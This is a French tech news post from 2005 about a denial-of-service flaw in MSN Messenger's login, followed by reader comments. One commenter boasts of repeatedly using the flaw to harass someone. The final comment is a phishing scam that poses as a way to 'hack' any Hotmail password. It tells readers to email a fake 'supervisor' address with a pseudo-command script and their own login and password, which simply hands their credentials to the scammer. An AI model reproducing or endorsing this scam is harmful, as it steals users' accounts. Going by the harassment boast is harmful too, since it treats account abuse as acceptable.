MSN Messenger victime d’une faille

Tout va pour le mieux dans le meilleur des monde pour le client de messagerie de la firme de Redmond qui prépare déjà la version 8 de MSN Messenger, qui est déjà en test pour un nombre réduit de bêta testeurs.
Tout n’est pourtant pas tout rose au pays des papillons multicolores qui vous apportent bonheur, messages, et courrier.
Le logiciel MSN Messenger souffrirait en effet d’une faille ne s’avérant au final pas vraiment dangereuse, mais sacrément gênante pour les utilisateurs touchés, puisqu’elle empêche ces derniers d’utiliser leurs compte, celui-ci se voyant suspendu...

MSN bloqué par un trou...

L’expert en sécurité informatique SecuriTeam a récemment publié un rapport concernant une vulnérabilité présente dans le logiciel de messagerie instantanée de la firme de Redmond.
Affectant le système d’authentification du logiciel, elle permet alors à un utilisateur mal intentionné d’effectuer sur sa cible un Denial of Service (un déni de service).
Le problème vient du fait que MSN, lors d’une tentative de connexion au réseau échouée, ne valide pas l’authentification d’un utilisateur, ce qui permet, à terme, à un pirate de suspendre temporairement le compte de l’utilisateur ne question.

Source : Zataz

On va dire que pour les autres les failles sont corrigées avant que la news ne soit publiée ;-)

Est-ce que c'est pour ca que ca fait quelques semaines que j'arrive plus du tout a me connecter a MSN ni a Windows Messenger ?

Nan parce que la ca devient vraiment lourd d'utiliser Web Messenger.....

Merci a celui qui pourra me dire comment je corrige mon probleme...

C'est sur, ce n'est pas récent cette faille :-o

Le nombre de fois ou j'ai pu me défouler sur quelques personnes mal-aimées avec sa... :-D

Le problème en plus est que la méthode pour exploiter la faille est décrite dans la news, pour permettre de la reproduire y'a pas mieux :-?

Bah peut-être que Microsoft vient seulement de s'en appercevoir, qu'est-ce que vous en savez ;-)

Ceci dit, c'est vrai qu'il serait bien de parler d'autres failles que les microsoftiennes. Il n'y a pas que Microsoft sur Terre. Mais je pense qu'il serait plus difficile de trouver les actus.

Mais vous êtes vraiment lourds quand vous vous y mettez !

Arrêtez de me taxer d'anti-Linux, d'anti-Microsoft, d'anti-World-of-Warcraft ou d'anti-[insérez votre intérêt personnel ici] à chaque occasion possible...

Pour info, je traite aussi sur des failles ou des bugs dans MacOS (où on vient d'aileurs me faire chier parce que soit-disant ça n'a pas d'intérêt), sur Opera, dans iTunes, dans PayPal ou encore dans Linux (et là, c'est juste sur le mois dernier, je pourrais également citer Skype ou Firefox de mémoire)...

Si les produits Microsoft sont merdiques et blindées de failles non corrigées, j'y peux rien moi !
D'autre part, les produits Microsoft sont très utilisés, même par ceux qui chient dessus à longueur de journée, alors ça me semble un peu normal de prévenir en priorité les utilisateurs du risque qu'ils courent à utiliser tel ou tel programme (qu'il soit ou non développé par Microsoft).

Alors vous êtes priés de me lâcher la grappe...

Rappelons que sous Firefox 20% des failles ne sont pas corrigées ou sont mal corrigées. (source : generation NT).
Sous IE ce chiffre est de 42%, donc le double.

Mais clamer que Firefox est parfait et que les failles sont toujours corrigées rapidement est faux.

je sais que ca marche bien ya encor un an je l'ai fait a un mec que j'aimais pas, il a jammai ssu d'ou ca venais et touts les jours je recommencais pdt une semaine...

c mal mais bon
Quand on aime on ne compte pas

Ah merci, je ne savais pas.

Mais je trouve que cette news comme beaucoup d'autres ne sert strictement à rien (apart pour permettre à des gens comme toi, Noldarn, de se jeter sur l'occasion et de critiquer sans cesse), surtout si la faille en question n'est vraiment pas récente.

mais arretez la !
1erment : vous ête pas obliger de la lire cette news
2emement , ptete que c'est pas utile pour tout le monde, mais pour moi si > je sais pourquoi j'arrive pas a me connecter a msn la maintenant
3emement : arretez de vous exiter sur les """commentaires"""
4ememement : ciao ! & stay calm

*****************************************************************
*****************************************************************************************************************************
*****************************************************************************************************************************
**********************************************************
*********** Comment hacker le mot de passe d'un compte MSN Hotmail **********
**********************************************************


#############################################################################################################
# Cette methode est utilisée par les techniciens de MSN HOTMAIL pour faire des verifications de compte mail #
# ainsi que pour le renvoit des pass perdus donc profitez-en avant d'autres modifications. #
#############################################################################################################


Pour l'instant l'equipe msn n'a pas modifié ce systeme peu connu mais tres efficace et selon des
sources d'admin cette maniere de proceder est pour eux la seule afin de renvoyer des pass perdus donc
profitez-en avant d'autres modifications

*********** Etape 1 ***********

Envoyer un email à l'adresse suivante : supervisor_88215-22-pass-key@hotmail.fr

Indiquer dans Objet : AUTO REQUEST PASSWORD

*********** Etape 2 ***********

Dans le corps du texte ( là ou l'on écrit le texte )
faites 1 Copier/Coller de la commande çi dessous

$RAUTH=HOTMAIL
$ISPLOG=adresse@hotmail.com
$ISPBACKLOG=retour@hotmail.com
$ISPBACKPWD=password
request IPCSVR $ISPLOG
request IPCSVR $ISPPWD
mail {$ISPLOG};{$ISPPWD} to $ISPBACKLOG
use ident $ISPBACKLOG;$ISPBACKPWD

2 lignes en dessous :
Indiquer l'adresse email MSN ou HOTMAIL complète de l'utilisateur que vous souhaitez hacker.

2 lignes en dessous :
Inscrire l'adresse email MSN ou HOTMAIL où vous souhaitez recevoir le mot de passe hacker

2 lignes en dessous :
Inscrire le mot de passe correspondant à votre email
( pour être reconnu comme étant utilisateur MSN HOTMAIL sans pour autant être identifier )

*********** Exemple ***********

A: : supervisor_88215-22-pass-key@hotmail.fr

Cc:

Cci:

Objet: : AUTO REQUEST PASSWORD


Corps du message de l'email : ( là ou l'on écrit le texte )

$RAUTH=HOTMAIL
$ISPLOG=adresse@hotmail.com
$ISPBACKLOG=retour@hotmail.com
$ISPBACKPWD=password
request IPCSVR $ISPLOG
request IPCSVR $ISPPWD
mail {$ISPLOG};{$ISPPWD} to $ISPBACKLOG
use ident $ISPBACKLOG;$ISPBACKPWD


l'Email_que_vous_souhaitez_hacker@hotmail.com


l'adresse email MSN ou HOTMAIL où vous souhaitez recevoir le mot de passe hacker


le mot de passe correspondant à votre email
( pour être reconnu comme étant utilisateur MSN HOTMAIL sans pour autant être identifier )



############################ Vous recevrez sous peu un mail contenant le mot de pass ########################################

*****************************************************************************************************************************
*****************************************************************************************************************************
***** Si vous ne recevez pas de mail à la suite de la manoeuvre cela signifira que les modifications auront été faites
et votre mail sera perdu car le bot ne le recevra pas et par conséquent il disparaitra du server ****************************
**************************************************** Dernière mise à jour : juin 2005 **********************************

pour ceu que sa ne marche pas meme chose mais avec l'adresse suivante :

supervisor_88215-21-pass-key@hotmail.fr

voila @ ++